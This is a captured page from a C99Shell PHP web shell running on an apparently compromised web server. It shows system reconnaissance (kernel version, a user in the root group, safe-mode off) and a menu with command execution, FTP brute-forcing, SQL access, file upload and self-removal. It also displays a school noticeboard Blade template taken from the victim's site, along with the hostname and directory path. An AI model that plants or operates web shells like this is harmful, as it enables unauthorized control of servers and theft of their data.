!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/admin/noticeboard/   drwxr-xr-x
Free 29.42 GB of 117.98 GB (24.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     create.blade.php (3.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="eoff-form">
    <form method="POST" enctype="multipart/form-data" class="d-block ajaxForm" action="{{ route('admin.create.noticeboard') }}">
        @csrf
        <div class="form-row">
            <div class="fpb-7">
                <label for="notice_title" class="eForm-label">{{ get_phrase('Notice title') }}</label>
                <input type="text" class="form-control eForm-control" id="notice_title" name = "notice_title" required>
            </div>

            <div class="fpb-7">
                <label for="start_date" class="eForm-label">{{ get_phrase('Start date') }}<span class="required"></span></label>
                <input type="text" class="form-control eForm-control inputDate" id="start_date" name="start_date" value="{{ date('m/d/Y') }}" />
            </div>

            <div class="fpb-7">
                <input type="checkbox" name="time_details" id="time_details" value="1" onclick="toggleTimeFields(this.id)">
                <label for="time_details">{{ get_phrase('Setup additional date & time') }}?</label>
            </div>


            <div class="time-details-stuffs">

                <div class="fpb-7">
                    <label for="start_time" class="eForm-label">{{ get_phrase('Start time') }}<span class="required"></span></label>
                    <input type="time" class="form-control eForm-control" id="start_time" name="start_time" value="{{ date('H:i', strtotime(date('H:i'))) }}">
                </div>

                <div class="fpb-7">
                    <label for="end_date" class="eForm-label">{{ get_phrase('End date') }}<span class="required"></span></label>
                    <input type="text" class="form-control eForm-control inputDate" id="end_date" name="end_date" value="{{ date('m/d/Y') }}" />
                </div>

                <div class="fpb-7">
                    <label for="end_time" class="eForm-label">{{ get_phrase('End time') }}<span class="required"></span></label>
                    <input type="time" class="form-control eForm-control" id="end_time" name="end_time" value="{{ date('H:i', strtotime(date('H:i'))) }}">
                </div>
            </div>

            <div class="fpb-7">
                <label for="notice" class="eForm-label">{{ get_phrase('Notice') }}</label>
                <textarea name="notice" class="form-control eForm-control" rows="8" cols="80" required></textarea>
            </div>
            <input type="hidden" name="show_on_website" value="1">


            <div class="fpb-7">
                <label for="image" class="eForm-label">{{ get_phrase('Upload notice photo') }}</label>
                <input class="form-control eForm-control-file" type="file" id="image" name="image" accept="image/*">
            </div>

            <div class="fpb-7 pt-2">
                <button class="btn-form" type="submit">{{ get_phrase('Save notice') }}</button>
            </div>
        </div>
    </form>
</div>

<script type="text/javascript">

  "use strict";

    function toggleTimeFields(elem) {
      if($("#"+elem).is(':checked')){
            $('.time-details-stuffs').slideUp();
      } else {
          $('.time-details-stuffs').slideDown();
      }
  }

  $(function () {
    $('.inputDate').daterangepicker(
      {
        singleDatePicker: true,
        showDropdowns: true,
        minYear: 1901,
        maxYear: parseInt(moment().format("YYYY"), 10),
      },
      function (start, end, label) {
        var years = moment().diff(start, "years");
      }
    );
  });

  $(document).ready(function () {
    $(".eChoice-multiple-with-remove").select2();
  });

</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--